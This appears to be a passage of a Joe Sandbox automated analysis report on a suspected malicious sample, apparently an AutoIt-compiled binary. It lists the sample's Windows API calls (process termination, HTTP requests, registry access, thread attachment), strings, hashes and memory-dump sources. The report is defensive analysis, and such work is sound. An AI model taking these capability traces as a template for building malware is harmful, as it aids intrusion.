                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F07F65
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F07F78
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F07F8B
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F07F9E
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F07FB1
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F07FC4
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F07FD7
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F07FEA
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F07FFD
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F08010
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F08023
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F08036
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F08049
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F0805C
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00F0806F
                                                                                        • __mtinitlocks.LIBCMT ref: 00F07B4C
                                                                                          • Part of subcall function 00F07E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00F9AC68,00000FA0,?,?,00F07B51,00F05E77,00F96C70,00000014), ref: 00F07E41
                                                                                        • __mtterm.LIBCMT ref: 00F07B55
                                                                                          • Part of subcall function 00F07BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F07B5A,00F05E77,00F96C70,00000014), ref: 00F07D3F
                                                                                          • Part of subcall function 00F07BBD: _free.LIBCMT ref: 00F07D46
                                                                                          • Part of subcall function 00F07BBD: DeleteCriticalSection.KERNEL32(00F9AC68,?,?,00F07B5A,00F05E77,00F96C70,00000014), ref: 00F07D68
                                                                                        • __calloc_crt.LIBCMT ref: 00F07B7A
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F07BA3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 2942034483-0
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EE281D
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EE2825
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EE2830
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EE283B
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EE2843
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE284B
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 1423608774-0
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F27C07
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F27C1D
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00F27C2C
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F27C3B
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F27C45
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F27C4C
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00F29A33
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F29A44
                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F29A51
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F29A5E
                                                                                          • Part of subcall function 00F293D1: CloseHandle.KERNEL32(?,?,00F29A6B,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F293DB
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F29A71
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F29A78
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        APIs
                                                                                          • Part of subcall function 00EFF4EA: std::exception::exception.LIBCMT ref: 00EFF51E
                                                                                          • Part of subcall function 00EFF4EA: __CxxThrowException@8.LIBCMT ref: 00EFF533
                                                                                        • __swprintf.LIBCMT ref: 00EE1EA6
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EE1D49
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 2125237772-557222456
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F3B006
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F3B115
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F3B298
                                                                                          • Part of subcall function 00F29DC5: VariantInit.OLEAUT32(00000000), ref: 00F29E05
                                                                                          • Part of subcall function 00F29DC5: VariantCopy.OLEAUT32(?,?), ref: 00F29E0E
                                                                                          • Part of subcall function 00F29DC5: VariantClear.OLEAUT32(?), ref: 00F29E1A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        APIs
                                                                                          • Part of subcall function 00EFC6F4: _wcscpy.LIBCMT ref: 00EFC717
                                                                                        • _memset.LIBCMT ref: 00F25438
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 00F25467
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F25513
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F2553D
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2027B
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F202B1
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F202C2
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F20344
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: DllGetClassObject
                                                                                        • API String ID: 753597075-1075368562
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F25075
                                                                                        • GetMenuItemInfoW.USER32 ref: 00F25091
                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00F250D7
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FA1708,00000000), ref: 00F25120
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: 8c0512b8b799e06d26248f337f0128347b4dda6801e7077f928449cc88d5bd6f
                                                                                        • Instruction ID: 799475033b7677df2386c37f1a8fd18a0c591fdcef489b2d4916bfaa659ee6d7
• Instruction Fuzzy Hash: 7C41F3316057119FD720DF28EC80B2BB7E4AF85B24F044A6EF865972D1D770E814DB62
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F2E742
• GetLastError.KERNEL32(?,00000000), ref: 00F2E768
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F2E78D
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F2E7B9
Strings
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID: p1#v`K$v
• API String ID: 3321077145-1068180069
• Opcode ID: 8b6b0d32459b0026647445d45790c052d7d97d20a063ccceef441d6f09e0e64e
• Instruction ID: c2f53034273b2f75a0cb5ceda41115d9cb08954c2e048479d7191ad512b9889d
• Instruction Fuzzy Hash: 79416639600614DFCF11EF56D444A5DBBE5BF89720B198098EA16AB3A2CB70FC00DB81
APIs
• CharLowerBuffW.USER32(?,?,?,?), ref: 00F40587
Strings
Similarity
• API ID: BuffCharLower
• String ID: cdecl$none$stdcall$winapi
• API String ID: 2358735015-567219261
• Opcode ID: 13305b5218544e08783ed3f0e9265550234f5ac627afacdaf8a18fd45f0ab39b
• Instruction ID: ada10ffe74cf4dcd69e5aa3903aa02c56e5cf974f6146594ef28dd3882182574
• Instruction Fuzzy Hash: 6231833190015AABCF00EF58CD519AEB7B4FF54324B104629E926B76D1DB71E916DB80
APIs
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00F1B88E
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00F1B8A1
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00F1B8D1
Strings
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: d0811e658f7d3780b585f96757dd912c8d2fe42e533f407f57cc9d5656e60eaf
• Instruction ID: a55677d2b60756cf30838bbd5b7864c5c718822e33ac4f7118b12b0180fa90ce
• Instruction Fuzzy Hash: 4B21EF72E00108BFDB08ABA5DC869FE77BDDF15760B104129F025A21E0DBB94D4BA660
APIs
• _memset.LIBCMT ref: 00EE522F
• _wcscpy.LIBCMT ref: 00EE5283
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EE5293
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F53CB0
Strings
Similarity
• API ID: IconLoadNotifyShell_String_memset_wcscpy
• String ID: Line:
• API String ID: 1053898822-1585850449
• Opcode ID: b59c38593aa3054f324ab4d84991516032438c6e46448802ed5038e969b0d292
• Instruction ID: 236e2fd8d7c7f6dc2be7a517d2bfe87348c8fa7685135117808dbeea302ca971
• Instruction Fuzzy Hash: 2831E4724087886EC720EB51EC42FDF77E8AF45354F00551AF685A21A1EF70A648DB92
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F34401
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F34427
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F34457
• InternetCloseHandle.WININET(00000000), ref: 00F3449E
  • Part of subcall function 00F35052: GetLastError.KERNEL32(?,?,00F343CC,00000000,00000000,00000001), ref: 00F35067
Strings
Similarity
• API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
• String ID:
• API String ID: 1951874230-3916222277
• Opcode ID: 3351bfb1be9193cb69bfe5cb0322536d952d88429d3c2940bd0bff7c1c0e700e
• Instruction ID: 43b3fa36dd258cdcc90800aeaa1a616a9a5d5b000b0acd208484ebed11d82d64
• Instruction Fuzzy Hash: 002192B2A00208BFE711DF54CC85FBF76ECEB48768F10842AF905D6140DA65AD05B771
APIs
  • Part of subcall function 00EFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EFD1BA
  • Part of subcall function 00EFD17C: GetStockObject.GDI32(00000011), ref: 00EFD1CE
  • Part of subcall function 00EFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EFD1D8
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F4915C
• LoadLibraryW.KERNEL32(?), ref: 00F49163
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F49178
• DestroyWindow.USER32(?), ref: 00F49180
Strings
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: 0893a0e49f6ffc3b2e3e5b31aa29cfc8630b3bd13afd55201148407921211842
• Instruction ID: 463aa4b69d096a3c5cec2f32c6943afb8ad0033bce7cc825a632a97dd2fdff4c
• Instruction Fuzzy Hash: DC215E71B0820ABBEF208E64DC85EBB3BA9EF99374F100619FD5492190D7B2DC51B760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00F29588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F295B9
• GetStdHandle.KERNEL32(0000000C), ref: 00F295CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F29605
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 3d432f95a6bac7a57c082e111f89b1027c3679c1c8ed009881e7ee65acf601ef
• Instruction ID: e29d1affd4410b3169f77f77b0e33f44b9aab7e0d9076cab2e42a103c11559d8
• Instruction Fuzzy Hash: 6C219571B042199BEB119F65EC06A9A77F4AF45720F244A19F8A1D72D0D7F0D940EB50
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00F29653
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F29683
• GetStdHandle.KERNEL32(000000F6), ref: 00F29694
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F296CE
Strings
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 215a7f813023d19e13a2baa974da226f2062332b4d2746d04ba8652bab9e24aa
• Instruction ID: 33efd262959e91491af7cbe29515fd7bd0f538fb7efdbfd38e2dc0ad4631fab5
• Instruction Fuzzy Hash: 91219871A042259BDB209F69AC54E9A7BE8AF45730F200A19FDB1E72D0D7F4D841EB50
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F2DB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F2DB5E
• __swprintf.LIBCMT ref: 00F2DB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00F7DC00), ref: 00F2DBB5
Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 651388b5cb89264812bac3c789c8087e49f621d7846273f3bd1ffbfef6621708
                                                                                        • Instruction ID: 2a5f252f40a53e60c87579d19657b32afc3941e74802932fb0c44d142d4302ab
                                                                                        • Opcode Fuzzy Hash: 651388b5cb89264812bac3c789c8087e49f621d7846273f3bd1ffbfef6621708
                                                                                        • Instruction Fuzzy Hash: C8218335A0014CAFDB10EF65DD85DAEB7F8EF89704B104069F509E7251DB71EA01EB61
                                                                                        APIs
                                                                                          • Part of subcall function 00F1C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F1C84A
                                                                                          • Part of subcall function 00F1C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1C85D
                                                                                          • Part of subcall function 00F1C82D: GetCurrentThreadId.KERNEL32 ref: 00F1C864
                                                                                          • Part of subcall function 00F1C82D: AttachThreadInput.USER32(00000000), ref: 00F1C86B
                                                                                        • GetFocus.USER32 ref: 00F1CA05
                                                                                          • Part of subcall function 00F1C876: GetParent.USER32(?), ref: 00F1C884
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00F1CA4E
                                                                                        • EnumChildWindows.USER32(?,00F1CAC4), ref: 00F1CA76
                                                                                        • __swprintf.LIBCMT ref: 00F1CA90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                        • String ID: %s%d
                                                                                        • API String ID: 3187004680-1110647743
                                                                                        • Opcode ID: ff58b2832b3a2a2719d7d810e51f3decc525001bf6092cc6b4edb6c9030b81cb
                                                                                        • Instruction ID: 96615f3262dba7355a3ea5aa58157b52853204ad2b4db9e4d795c10cabd81f34
                                                                                        • Opcode Fuzzy Hash: ff58b2832b3a2a2719d7d810e51f3decc525001bf6092cc6b4edb6c9030b81cb
                                                                                        • Instruction Fuzzy Hash: F5117271A402097BDB11BF60DCD5FE93778AF54714F008066FA1CAA182CB749585EBB1
                                                                                        APIs
                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F419F3
                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F41A26
                                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F41B49
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F41BBF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2364364464-0
                                                                                        • Opcode ID: 04752bd66f6dcc45dca56dfca296e4413128d0826d0b8a689d059c5f8261c4d9
                                                                                        • Instruction ID: 1d1300bf68c34a8d70599efe610b5e85ece7a52ae990c65fd8932f1825f36039
                                                                                        • Opcode Fuzzy Hash: 04752bd66f6dcc45dca56dfca296e4413128d0826d0b8a689d059c5f8261c4d9
                                                                                        • Instruction Fuzzy Hash: 7F815171A00218EBDF109F64C886BADBBE5FF48720F148459FA15BF3C2D7B5A9419B90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F4E1D5
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00F4E20D
                                                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 00F4E248
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F4E269
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F4E281
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3188977179-0
                                                                                        • Opcode ID: 840eb013563524420539a1c42853498a612125efc3392a2bc81ad1fafa21ba8c
                                                                                        • Instruction ID: 61b1de75b4fa29713b2384530299382437eff6ff4dd641dd816dec2ebd585cb5
                                                                                        • Opcode Fuzzy Hash: 840eb013563524420539a1c42853498a612125efc3392a2bc81ad1fafa21ba8c
                                                                                        • Instruction Fuzzy Hash: 35618075E44208AFDB25CF58CC54FBA7BBABF8A310F144059ED5597391C7B1A940EB10
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F21CB4
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00F21D26
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00F21D81
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F21DF8
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F21E26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                        • String ID:
                                                                                        • API String ID: 4136290138-0
                                                                                        • Opcode ID: c6a565840a21d1acf4fb5f3a68356a4ac79e56acafbdd69749701885fa7a931b
                                                                                        • Instruction ID: e79663b89066ae299c2dcb48c38dad67a3a58fe041b8a366d5f8c2a255818b04
                                                                                        • Opcode Fuzzy Hash: c6a565840a21d1acf4fb5f3a68356a4ac79e56acafbdd69749701885fa7a931b
                                                                                        • Instruction Fuzzy Hash: 9F5167B5A00219EFCB14CF58D880AAAB7B8FF8C314B158559ED59DB300E730EA11CFA4
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00F406EE
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00F4077D
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F4079B
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00F407E1
                                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00F407FB
                                                                                          • Part of subcall function 00EFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00F2A574,?,?,00000000,00000008), ref: 00EFE675
                                                                                          • Part of subcall function 00EFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00F2A574,?,?,00000000,00000008), ref: 00EFE699
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 327935632-0
                                                                                        • Opcode ID: 92f4bb1c9b6ecd9ed5235ab1a6eb98c71d6c34aa3f30de3a7630a6ff26e064b6
                                                                                        • Instruction ID: 87b5a85d96ff8d026c67d08482cd6ce081540739e9128681f894f71493ac2d1b
                                                                                        • Opcode Fuzzy Hash: 92f4bb1c9b6ecd9ed5235ab1a6eb98c71d6c34aa3f30de3a7630a6ff26e064b6
                                                                                        • Instruction Fuzzy Hash: 03516975A00249DFCB00EFA8C981DADBBF5BF49320B158055EA15AB362DB70ED46DF81
                                                                                        APIs
                                                                                          • Part of subcall function 00F43C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F42BB5,?,?), ref: 00F43C1D
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F42EEF
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F42F2E
                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F42F75
                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00F42FA1
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F42FAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                        • String ID:
                                                                                        • API String ID: 3740051246-0
                                                                                        • Opcode ID: 522b3a8837b501e9411f59ba315ac46042a3081b048a5aca1405304867df09ad
                                                                                        • Instruction ID: 50610d4b494df435ce7f8b192fa59ab03467c7ef33bd8d19b9100973b124feb7
